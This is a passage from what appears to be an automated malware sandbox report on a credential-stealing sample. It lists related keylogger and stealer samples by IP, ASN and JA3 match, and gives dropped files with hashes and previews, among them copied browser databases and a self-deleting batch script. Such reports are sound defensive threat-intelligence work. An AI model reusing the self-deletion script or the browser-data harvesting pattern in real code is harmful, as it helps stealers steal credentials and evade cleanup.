                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        TELEGRAMRUSetup.msiGet hashmaliciousVidarBrowse
                                                                                        • 149.154.167.99
                                                                                        ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        69633f.msiGet hashmaliciousVidarBrowse
                                                                                        • 149.154.167.99
                                                                                        CLOUDFLARENETUShngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                        • 172.65.251.78
                                                                                        http://kmaybelsrka.sbs:6793/bab.zipGet hashmaliciousUnknownBrowse
                                                                                        • 1.1.1.1
                                                                                        CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.64.41.3
                                                                                        https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                        • 162.159.61.3
                                                                                        CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 104.21.2.110
                                                                                        Documento_Contrato_Seguro_18951492.msiGet hashmaliciousAteraAgentBrowse
                                                                                        • 104.18.21.76
                                                                                        Documento_Contrato_Seguro_25105476.msiGet hashmaliciousAteraAgentBrowse
                                                                                        • 104.18.21.76
                                                                                        http://sharefileon.comGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        http://www.kukaj-to.chat/sedoGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.50.223
                                                                                        5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                                        • 104.26.0.231

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0ehngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                        • 149.154.167.220
                                                                                        http://escrowmedifllc.hostconstructionapp.comGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                        • 149.154.167.220
                                                                                        ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 149.154.167.220
                                                                                        pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 149.154.167.220
                                                                                        IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 149.154.167.220

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zyEDYRU0jw.exe_69bb14e67bf623e7cd983b9932faed9719bbef3_4770cf9e_2f9d7045-0f69-4f93-92b8-b49f0c4ad2e3\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.4632419396097684
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:HdXBOipYQNEex0WbkzhnaOKymScZlEZrLOdzuiFrZ24IO85H+:1BNHaWbkdasmX0KzuiFrY4IO8Z+
                                                                                        MD5:5770C42AACDA0340AEDB026247E6C054
                                                                                        SHA1:FBC86602A1EA83E16C14CC8F56AD2425941D9714
                                                                                        SHA-256:F68FCBD7A4777CF64FC6C7130BB2846CEBEF2F1874F990F73516957ACD55B09E
                                                                                        SHA-512:1D07E8AF4C3F5AB92E5509B4E5FDE94E57D240769F70A8C9E3AD07ECAA71BCC620594B65FAB789176D316CEF9FBFE93EA27DB024C46E09FDC676A616FDF4A1B7
                                                                                        Malicious:true
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.3.4.8.3.6.5.7.2.4.4.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.3.4.8.3.7.6.6.6.1.9.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.9.d.7.0.4.5.-.0.f.6.9.-.4.f.9.3.-.9.2.b.8.-.b.4.9.f.0.c.4.a.d.2.e.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.c.2.2.4.4.8.-.d.5.0.8.-.4.4.8.a.-.9.4.7.6.-.e.e.0.5.5.d.5.e.d.5.4.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.y.E.D.Y.R.U.0.j.w...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.4.8.-.0.0.0.1.-.0.0.1.4.-.f.7.1.9.-.d.c.0.c.b.4.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.d.4.2.e.3.c.5.f.c.2.4.e.3.0.9.5.8.1.8.1.9.c.b.a.7.2.3.b.1.4.c.3.c.2.4.7.d.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD44F.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Dec 17 18:47:17 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):236102
                                                                                        Entropy (8bit):4.040330280132799
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:V798g4uEqDNZLTg8ynECYypx+cCd562+zhz:V72g4KTg8ynkyibIpd
                                                                                        MD5:32E70EE5E371EFF1D91CFA2F8DE08D20
                                                                                        SHA1:8FEACFCDDB7FAC94114584CA1201CD11924F6702
                                                                                        SHA-256:8B2AD04155269C5340CC175204926DC4BB9A5A49E43D8B669A684BEC3C41634B
                                                                                        SHA-512:4451EA1212386D3ADDE79BECD333B1AC97189AA9416E0E47B1A160C1B81057E94B2B18AC24FDEF7E2D7E869995C74CC003B9A92F34735675441F9BF3DA75C6CF
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .......5.ag............4............0..H.......<...d7......$!..rK..........`.......8...........T...........`}...............7...........9..............................................................................eJ......$:......GenuineIntel............T.......H...!.ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD663.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8372
                                                                                        Entropy (8bit):3.689677835283867
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJmk26C6YEIjSUuvgmfZqqJpDj89b/qsfDVm:R6lXJs6C6YEsSUuvgmfPI/Jfs
                                                                                        MD5:A607CD7770F05EEFA08A44C199935BD2
                                                                                        SHA1:6D10F69B95C433753B3928E36881270250CC10EF
                                                                                        SHA-256:89089684FEDC25489A2F0FAFEC6C2B5632AB0C9F636AD24F71D1BC5B180176A9
                                                                                        SHA-512:2BE19C383864B540A031D34ACAF2C99E3612ED7A179E40CACA511BCAA53E65D5129DC9E7ADA52CE81962966A2B4C3F6BFAC8B09F15425BB99950D2341933921A
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.5.2.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6B2.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4714
                                                                                        Entropy (8bit):4.461629771827499
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsTJg77aI9dSWpW8VYBPYm8M4JmpMPFrI+q8vrpMxImLNegi5d:uIjftI7zz7VKSJ6KuImLNegYd
                                                                                        MD5:01A775D12581D222292CB9F3A56795C2
                                                                                        SHA1:61F4D9A296D2482BB8CE017902942994D0345D5B
                                                                                        SHA-256:8208B089C2F0EC142A6F4C710D8753AC05B903BBD1B423A65E519AB0D5869979
                                                                                        SHA-512:6C80A6D7862142EBE5E5DB1223457D162590B95BFB5B2ABA67EBD81C0C0FAC57E3BDB7BA1A5FA8CA81007860E943821D0AEE918DCD096B054AA3384D4E5EE68C
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="635629" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\Users\user\AppData\Local\Temp\bwvswysc.wf3

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):601365
                                                                                        Entropy (8bit):6.008791134195978
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:l11e8OdHB+LeuC6MeAOXw6VwIHDIu62IPXjHf:lTenHw1C6MqgIDjyPT/
                                                                                        MD5:174BC06D568819E002A136E848701847
                                                                                        SHA1:DECE64C7FC14E7F0D9EF0ACFEF61D2E251242E85
                                                                                        SHA-256:0BD2C19EA8665923BD8DD8D3992BBB2DB9B958B46CAACAD84DC5E03C258C7EB1
                                                                                        SHA-512:17F4EAEC278BD8A8FB23FEA92D7F698379132F46CA2C6A97003EA30A4E27F411BDD9A26FDA585499208EFEA25D6C23375EB9857EC5B699D84CE934F91F7B9A9B
                                                                                        Malicious:false
                                                                                        Preview:{"browser":{"first_run_finished":true,"first_run_study_group":"EnabledE-5","shortcut_migration_version":"117.0.5938.132"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.696426810068423e+12,"network":1.69642681e+12,"ticks":423833625.0,"uncertainty":2034246.0}},"os_crypt":{"app_bound_fixed_data":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAG7I4XamucEiJgTIvWNrX8QAAAAACAAAAAAAQZgAAAAEAACAAAABcByHmkJWMthaaF6PAj44r6G5q8HbZMYQ78KiV7ktVmQAAAAAOgAAAAAIAACAAAAA7QovYWUH9jKwer+mATh0d48meKRQtltSX16XxxPWWA2ABAAC4ore7HQTXddwLyE2jwNV/4ftVW9+MWocSg5WPR1FRhkd6090OQ8PyZLBU3Rc+zrrowkC6sKrTpTldlSWYMhzsNLXud9KDCMJbKu4celgfQ0Xli7lHCLEZtJdZB7XRZLdPzIA7yCELaNh0Tzk8tAn7OkKs/GwqTXg/0IRrDQwRjtlhpS2MXt4c7Nip//L0neEWgM2K6pW7nC6hZt+1PTTJQd1HLQI25gileFmmT7iZTmDbfhwI65gCxAbSmasdgEWMsLDPxtgVj1AgzCFIDTXul8NsIYjviDd1l7pez16jtmwELJT2bRUZ0

                                                                                        C:\Users\user\AppData\Local\Temp\dcchqutn.fpz

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44137
                                                                                        Entropy (8bit):6.0906888050947225
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMEcwuF9hDO6vP6O9Htbzy70FqHoPFkGoup1Xl3jC:z/Ps+wsI7ynEd6Jtbz8hu3VlXr4CRoX
                                                                                        MD5:6F8FFE68CBDE7984212AC28FB4502998
                                                                                        SHA1:04A8B89447F7AFBC4ADF55A3CCEDF082FA58FF84
                                                                                        SHA-256:871374A34C6A3799519FCCF50B91C3DFF7F543710B2F7EEF5003618E84032C31
                                                                                        SHA-512:72834E16907E2B0E3637F7A969978E06E52CC660754F3E734585B5D3FDCBD02F99076757C572C595FA322E99C286A66ED95ABAEA791F98A9FA77E815052CF85A
                                                                                        Malicious:false
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                        C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):107
                                                                                        Entropy (8bit):5.24221801046739
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:HFTEOuMJcFKsoWwBRZDEXEPUWJRWfVXbn:yOuMJNWweoNJAdLn
                                                                                        MD5:68BAA8FFE82EC46B333B016CD528507B
                                                                                        SHA1:07F50DF9031093C3C2B6E068EFBFB42A72249FBF
                                                                                        SHA-256:139D9ED72B18ACC52382C5C0FCA7DDA99237E1DE794A4F0F9CF6FFDA44B38368
                                                                                        SHA-512:763254419A318617F34FDD5D141112AACE2C37E83233D9F18F42A167CF0DE493FDF57E87B36073DE174CEA00729087D623DFB10A387C79257F1ED44E492C8C3E
                                                                                        Malicious:false
                                                                                        Preview:chcp 65001..TaskKill /F /IM 1352..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\zyEDYRU0jw.exe"..

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB06B.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):98304
                                                                                        Entropy (8bit):0.08235737944063153
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB07C.tmp.tmpdb

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):294912
                                                                                        Entropy (8bit):0.08438200565341271
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                        MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                        SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                        SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                        SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB0CB.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB0CC.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.8439810553697228
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB0CD.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.136413900497188
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB0DE.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.136413900497188
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB0DF.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.136413900497188
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB10E.tmp.dat

                                                                                        Download File
